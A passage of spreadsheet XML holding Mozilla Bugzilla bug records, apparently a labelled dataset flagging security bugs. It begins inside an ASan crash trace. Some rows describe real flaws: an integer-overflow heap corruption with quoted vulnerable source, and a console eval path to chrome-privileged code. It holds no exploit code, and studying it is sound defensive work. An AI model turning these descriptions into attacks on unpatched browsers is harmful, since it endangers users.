    #32 0x7f0e209e9552 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:603:8
    #33 0x7f0e20b9ba61 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.h:98:10
    #34 0x7f0e20b9ba61 in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Promise.cpp:1660
    #35 0x7f0e209e6f97 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:13
    #36 0x7f0e209e6f97 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:532
    #37 0x7f0e209e9552 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:603:8
    #38 0x7f0e215cbe56 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2623:10
    #39 0x7f0e171ef37c in mozilla::dom::PromiseJobCallback::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/PromiseBinding.cpp:26:8
    #40 0x7f0e11a5222f in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:91:12
    #41 0x7f0e11a5222f in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:104
    #42 0x7f0e11a5222f in mozilla::PromiseJobRunnable::Run(mozilla::AutoSlowOperation&amp;) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:235
    #43 0x7f0e11a2388e in mozilla::CycleCollectedJSContext::PerformMicroTaskCheckPoint(bool) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:595:17
    #44 0x7f0e11a2442a in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:437:3
    #45 0x7f0e14040b75 in XPCJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:1261:28
    #46 0x7f0e11cb501f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1226:24
    #47 0x7f0e11cbbfbd in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #48 0x7f0e12f38b7f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #49 0x7f0e12e2032e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #50 0x7f0e12e2032e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #51 0x7f0e12e2032e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #52 0x7f0e1c1cca13 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #53 0x7f0e2070586e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:911:20
    #54 0x7f0e12e2032e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #55 0x7f0e12e2032e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #56 0x7f0e12e2032e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #57 0x7f0e207049c3 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:749:34
    #58 0x563e39bbc874 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:49:28
    #59 0x563e39bbc874 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:265
    #60 0x7f0e35594b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #61 0x563e39ae1efc in _start (/home/nils/browser/firefox/firefox/firefox+0x2defc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/Assertions.h:314:3 in MOZ_Crash(char const*, int, char const*)
==24009==ABORTING</t>
        </is>
      </c>
      <c r="X21" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" t="n">
        <v>876577</v>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>2013-05-27 22:44:55 -0700</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>Support forum on SUMO is broken, only showing one thread</t>
        </is>
      </c>
      <c r="D22" t="inlineStr">
        <is>
          <t>2013-05-28 14:02:59 -0700</t>
        </is>
      </c>
      <c r="E22" t="n">
        <v>1</v>
      </c>
      <c r="F22" t="n">
        <v>1</v>
      </c>
      <c r="G22" t="n">
        <v>5</v>
      </c>
      <c r="H22" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I22" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J22" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K22" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L22" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M22" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N22" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O22" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P22" t="inlineStr">
        <is>
          <t>u=contributors c=questions p=1 s=2013.11</t>
        </is>
      </c>
      <c r="Q22" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R22" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S22" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T22" t="n">
        <v>1</v>
      </c>
      <c r="U22" t="n">
        <v>0</v>
      </c>
      <c r="V22" t="n">
        <v>13</v>
      </c>
      <c r="W22" t="inlineStr">
        <is>
          <t>Go to https://support.mozilla.org/en-US/questions and only one thread is showing up. After that the page ends abruptly; no footer.</t>
        </is>
      </c>
      <c r="X22" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" t="n">
        <v>1480848</v>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>2018-08-03 11:05:14 -0700</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>update cryptography library to &gt; 2.2.2</t>
        </is>
      </c>
      <c r="D23" t="inlineStr">
        <is>
          <t>2018-08-06 11:17:24 -0700</t>
        </is>
      </c>
      <c r="E23" t="n">
        <v>1</v>
      </c>
      <c r="F23" t="n">
        <v>1</v>
      </c>
      <c r="G23" t="n">
        <v>4</v>
      </c>
      <c r="H23" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I23" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J23" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K23" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L23" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M23" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N23" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O23" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P23" t="inlineStr"/>
      <c r="Q23" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R23" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S23" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T23" t="n">
        <v>1</v>
      </c>
      <c r="U23" t="n">
        <v>0</v>
      </c>
      <c r="V23" t="n">
        <v>5</v>
      </c>
      <c r="W23" t="inlineStr">
        <is>
          <t>Our safety checker is reporting a security issue in one of the libraries in requirements/constraints.txt:
"""
[python] cryptography
Installed: 2.1.4; Affected: &lt;=2.2.2;
python-cryptography versions &gt;=1.9.0 and &lt;2.3 did not enforce a minimum tag length for finalize_with_tag API. If a user did not validate the input length prior to passing it to finalize_with_tag an attacker could craft an invalid payload with a shortened tag (e.g. 1 byte) such that they would have a 1 in 256 chance of passing the MAC check. GCM tag forgeries ca...
"""
This bug covers updating that.</t>
        </is>
      </c>
      <c r="X23" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" t="n">
        <v>459524</v>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>2008-10-11 15:38:06 -0700</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>SOCKS5 reply with DNS name longer than 15 characters corrupts data</t>
        </is>
      </c>
      <c r="D24" t="inlineStr">
        <is>
          <t>2009-12-16 16:20:30 -0800</t>
        </is>
      </c>
      <c r="E24" t="n">
        <v>1</v>
      </c>
      <c r="F24" t="n">
        <v>1</v>
      </c>
      <c r="G24" t="n">
        <v>3</v>
      </c>
      <c r="H24" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I24" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J24" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K24" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L24" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M24" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N24" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O24" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P24" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q24" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R24" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S24" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T24" t="n">
        <v>1</v>
      </c>
      <c r="U24" t="n">
        <v>0</v>
      </c>
      <c r="V24" t="n">
        <v>41</v>
      </c>
      <c r="W24" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
If Firefox receives SOCKS5 reply with DNS name longer than 15 characters then the subsequent data transfer will be corrupted. This will result with either pages being corrupted at the beginning, or with a Save As dialog being opened.
This quite possibly is a buffer overrun bug! And quite possibly it's an exploitable one too (that's why I'm classifying it as critical bug). It looks like Firefox can handle SOCKS5 replies up to 22 bytes in size - 22 bytes is needed for SOCKS5 reply holding IPv6 address. SOCKS5 reply with 15 character DNS name takes 22 bytes as well. Btw the maximum SOCKS5 reply is 262 bytes.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X24" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" t="n">
        <v>528425</v>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>2009-11-12 22:13:00 -0800</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>exthandler doesnt compile when using widget=cairo-qt</t>
        </is>
      </c>
      <c r="D25" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E25" t="n">
        <v>1</v>
      </c>
      <c r="F25" t="n">
        <v>1</v>
      </c>
      <c r="G25" t="n">
        <v>6</v>
      </c>
      <c r="H25" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I25" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J25" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K25" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L25" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M25" t="inlineStr">
        <is>
          <t>Maemo</t>
        </is>
      </c>
      <c r="N25" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O25" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P25" t="inlineStr"/>
      <c r="Q25" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R25" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S25" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T25" t="n">
        <v>1</v>
      </c>
      <c r="U25" t="n">
        <v>0</v>
      </c>
      <c r="V25" t="n">
        <v>5</v>
      </c>
      <c r="W25" t="inlineStr">
        <is>
          <t>When building for qt, the we make assumptions about HILDON being gtk/gnome based.</t>
        </is>
      </c>
      <c r="X25" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" t="n">
        <v>771859</v>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>2012-07-07 18:56:01 -0700</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>Console eval results capable of executing chrome-privileged code</t>
        </is>
      </c>
      <c r="D26" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:06 -0700</t>
        </is>
      </c>
      <c r="E26" t="n">
        <v>1</v>
      </c>
      <c r="F26" t="n">
        <v>1</v>
      </c>
      <c r="G26" t="n">
        <v>3</v>
      </c>
      <c r="H26" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I26" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J26" t="inlineStr">
        <is>
          <t>Console</t>
        </is>
      </c>
      <c r="K26" t="inlineStr">
        <is>
          <t>14 Branch</t>
        </is>
      </c>
      <c r="L26" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M26" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N26" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O26" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P26" t="inlineStr">
        <is>
          <t>fixed by bug 772506 [qa?][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q26" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R26" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S26" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T26" t="n">
        <v>1</v>
      </c>
      <c r="U26" t="n">
        <v>0</v>
      </c>
      <c r="V26" t="n">
        <v>57</v>
      </c>
      <c r="W26" t="inlineStr">
        <is>
          <t>Current release and beta builds vulnerable (13 and 14).
1. Open the attached POC
2. In the Web Console, inspect the paragraph element:
 &gt; document.getElementById("p");
HUDService.jsm plays it loose with (wrapperless) eval results.  JST_execute passes the eval result into formatResult, which allows the content-supplied object to override toSource or toString to return whatever it likes.  From there, it hits writeOutputJS and createMessageNode.  (Side note: for fun, starting with writeOutputJS, follow the call graph and check out all the places the unsafe aOutputObject can visit: &lt;http://mxr.mozilla.org/mozilla-beta/source/browser/devtools/webconsole/HUDService.jsm#5059&gt;.)
If the toSource/toString override returned a DOM node, that node eventually gets inserted into the browser.xul document(!).  From there, we can do the ol' "exploit on* event attributes to run with chrome privileges".
Plausible attack:
Take something interesting, like a prouget demo, and insert a variation of this exploit.  Use Proxies (those are available to content, right?) to ensure that virtually any expression that the user enters will result in an object with a  malicious toSource/toString.
This POC doesn't work with Aurora and nightly builds, due to the async console split (bug 673148) and further changes.  It's possible that HUDService-content.js is vulnerable, though; I simply haven't looked into it.
Sorry for the drive-by and hurried comment.  It's late and I have early morning obligations.</t>
        </is>
      </c>
      <c r="X26" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" t="n">
        <v>805121</v>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>2012-10-24 11:35:17 -0700</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>String Replacement Heap Corruption Remote Code Execution Vulnerability (ZDI-CAN-1473)</t>
        </is>
      </c>
      <c r="D27" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:22 -0700</t>
        </is>
      </c>
      <c r="E27" t="n">
        <v>1</v>
      </c>
      <c r="F27" t="n">
        <v>1</v>
      </c>
      <c r="G27" t="n">
        <v>3</v>
      </c>
      <c r="H27" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I27" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J27" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K27" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L27" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M27" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N27" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O27" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P27" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q27" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R27" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S27" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T27" t="n">
        <v>1</v>
      </c>
      <c r="U27" t="n">
        <v>0</v>
      </c>
      <c r="V27" t="n">
        <v>36</v>
      </c>
      <c r="W27" t="inlineStr">
        <is>
          <t>Created attachment 674762
PoC
ZDI-CAN-1473: Mozilla Firefox String Replacement Heap Corruption Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
An integer overflow is possible when calculating the length for a Javascript string concatenation. 
mozilla-release\js\src\jsstr.cpp    
FindReplaceLength(JSContext *cx, RegExpStatics *res, ReplaceData &amp;rdata, size_t *sizep)
    ...
    JSString *repstr = rdata.repstr;
    size_t replen = repstr-&gt;length();
    for (const jschar *dp = rdata.dollar, *ep = rdata.dollarEnd; dp;
         dp = js_strchr_limit(dp, '$', ep)) {
        JSSubString sub;
        size_t skip;
        if (InterpretDollar(cx, res, dp, ep, rdata, &amp;sub, &amp;skip)) {
           replen += sub.length - skip;
            dp += skip;
        } else {
            dp++;
        }
    }
    *sizep = replen;
    return true;
The for loop above illustrates the problem: the looped arithmetic operation to add to replen can result in replen wrapping. The code below shows the use of the above function in a vulnerable fashion: 
ReplaceRegExpCallback(JSContext *cx, RegExpStatics *res, size_t count, void *p)
    ...
    size_t replen = 0;  /* silence 'unused' warning */
   if (!FindReplaceLength(cx, res, rdata, &amp;replen))
        return false;
    size_t growth = leftlen + replen;
   if (!rdata.sb.reserve(rdata.sb.length() + growth))
        return false;
    rdata.sb.infallibleAppend(left, leftlen); /* skipped-over portion of the search value */
   DoReplace(cx, res, rdata);
The call to FindReplaceLength can result in a wrapped replen value, which when used for allocation, causes an undersized allocation. Use of the undersized allocation results in memory corruption.
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   pa_kt / twitter.com/pa_kt</t>
        </is>
      </c>
      <c r="X27" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" t="n">
        <v>1796023</v>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>2022-10-18 17:15:30 -0700</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>nsLocalFile::GetNativeTarget can silently truncate the link target</t>
        </is>
      </c>
      <c r="D28" t="inlineStr">
        <is>
          <t>2024-04-28 23:34:28 -0700</t>
        </is>
      </c>
      <c r="E28" t="n">
        <v>1</v>
      </c>
      <c r="F28" t="n">
        <v>1</v>
      </c>
      <c r="G28" t="n">
        <v>3</v>
      </c>
      <c r="H28" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I28" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J28" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K28" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L28" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M28" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N28" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O28" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P28" t="inlineStr">
        <is>
          <t>[adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q28" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R28" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S28" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T28" t="n">
        <v>1</v>
      </c>
      <c r="U28" t="n">
        <v>0</v>
      </c>
      <c r="V28" t="n">
        <v>16</v>
      </c>
      <c r="W28" t="inlineStr">
        <is>
          <t>The basic problem is the same as in bug 1791029 — we don't check if the buffer passed to `readlink` was actually big enough.  If there's a race with changing the symlink, or if `lstat` doesn't give the actual length (e.g., Linux procfs): bug 1791029 took care of the case where the actual value is shorter than expected, but if it's *longer* than expected, we'll silently truncate it.
The approach that GNU `ls` seems to take is: allocate the buffer 1 byte longer than expected, so we can distinguish the expected result from the string being longer, and then in case of overflow, double the buffer length and retry until it works.  GNU `readlink`, in contrast, doesn't stat the symlink and just starts with 64 and doubles the buffer size until it fits.</t>
        </is>
      </c>
      <c r="X28" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" t="n">
        <v>399807</v>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>2007-10-14 13:38:42 -0700</t>
        </is>
      </c>
      <c r="C29" t="inlineStr">
        <is>
          <t>Ts jump on bl-bldxp01 during 2007-10-14</t>
        </is>
      </c>
      <c r="D29" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E29" t="n">
        <v>1</v>
      </c>
      <c r="F29" t="n">
        <v>1</v>
      </c>
      <c r="G29" t="n">
        <v>5</v>
      </c>
      <c r="H29" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I29" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J29" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K29" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L29" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M29" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N29" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O29" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P29" t="inlineStr"/>
      <c r="Q29" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R29" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S29" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T29" t="n">
        <v>1</v>
      </c>
      <c r="U29" t="n">
        <v>0</v>
      </c>
      <c r="V29" t="n">
        <v>7</v>
      </c>
      <c r="W29" t="inlineStr">
        <is>
          <t>A bunch of stuff happened with bl-bldxp01 recently:
20071003: The TightVNC server refused to restart, and was replaced with RealVNC, bug 398423. 
  ==&gt; All the test results re-baselined at higher values
20071012: Perf tests stopped Was restarted by unknown method, bug 399679
  ==&gt; Perf results jumped back to the old values
20071013 - 2030: Perf tests stopped
20071014 - 0700: Connected with VNC, used ^C to stop tinderbox, then start it up again. 
  ==&gt; Perf results are back to high values, except Ts which jumped even higher (~ 3150ms)
20071014 - 0900: Ts still high after three runs, rebooted the machine
  ==&gt; Perf results unchanged
20071014 - 1100: Shut tbox down, clean out the dir where builds are extracted, and make sure that TightVNC server not started on boot, reboot
  ==&gt; Perf results unchanged
Graphs:
Tp http://build-graphs.mozilla.org/graph/query.cgi?tbox=bl-bldxp01_head&amp;testname=pageload&amp;autoscale=1&amp;units=ms&amp;avg=1&amp;days=16
Tp2
http://build-graphs.mozilla.org/graph/query.cgi?tbox=bl-bldxp01_head&amp;testname=pageload2&amp;autoscale=1&amp;units=ms&amp;avg=1&amp;days=16
Tdhtml
http://build-graphs.mozilla.org/graph/query.cgi?tbox=bl-bldxp01_head&amp;testname=dhtml&amp;autoscale=1&amp;size=&amp;units=ms&amp;avg=1&amp;days=16
Txul
http://build-graphs.mozilla.org/graph/query.cgi?tbox=bl-bldxp01_head&amp;testname=xulwinopen&amp;autoscale=1&amp;size=&amp;units=ms&amp;avg=1&amp;days=16
Ts
http://build-graphs.mozilla.org/graph/query.cgi?tbox=bl-bldxp01_head&amp;testname=startup&amp;autoscale=1&amp;size=&amp;units=ms&amp;avg=1&amp;days=21</t>
        </is>
      </c>
      <c r="X29" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" t="n">
        <v>604843</v>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>2010-10-15 19:43:06 -0700</t>
        </is>
      </c>
      <c r="C30" t="inlineStr">
        <is>
          <t>"ASSERTION: No text for IsSpace" with wrapping inside table cell</t>
        </is>
      </c>
      <c r="D30" t="inlineStr">
        <is>
          <t>2011-01-27 17:29:13 -0800</t>
        </is>
      </c>
      <c r="E30" t="n">
        <v>1</v>
      </c>
      <c r="F30" t="n">
        <v>1</v>
      </c>
      <c r="G30" t="n">
        <v>3</v>
      </c>
      <c r="H30" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I30" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J30" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K30" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L30" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M30" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N30" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O30" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P30" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q30" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R30" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S30" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T30" t="n">
        <v>1</v>
      </c>
      <c r="U30" t="n">
        <v>0</v>
      </c>
      <c r="V30" t="n">
        <v>16</v>
      </c>
      <c r="W30" t="inlineStr">
        <is>
          <t>Created attachment 483694
testcase
###!!! ASSERTION: No text for IsSpace!: 'aPos &lt; aFrag-&gt;GetLength()', 
file layout/generic/nsTextFrameThebes.cpp, line 627
###!!! ASSERTION: bad index: 'PRUint32(aIndex) &lt; mState.mLength', 
file nsTextFragment.h, line 204</t>
        </is>
      </c>
      <c r="X30" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" t="n">
        <v>780712</v>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>2012-08-06 13:54:22 -0700</t>
        </is>
      </c>
      <c r="C31" t="inlineStr">
        <is>
          <t>Crash [@ JSC::Yarr::execute] or [@ js::RegExpShared::execute]</t>
        </is>
      </c>
      <c r="D31" t="inlineStr">
        <is>
          <t>2013-01-14 08:24:23 -0800</t>
        </is>
      </c>
      <c r="E31" t="n">
        <v>1</v>
      </c>
      <c r="F31" t="n">
        <v>1</v>
      </c>
      <c r="G31" t="n">
        <v>3</v>
      </c>
      <c r="H31" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I31" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J31" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K31" t="inlineStr">
        <is>
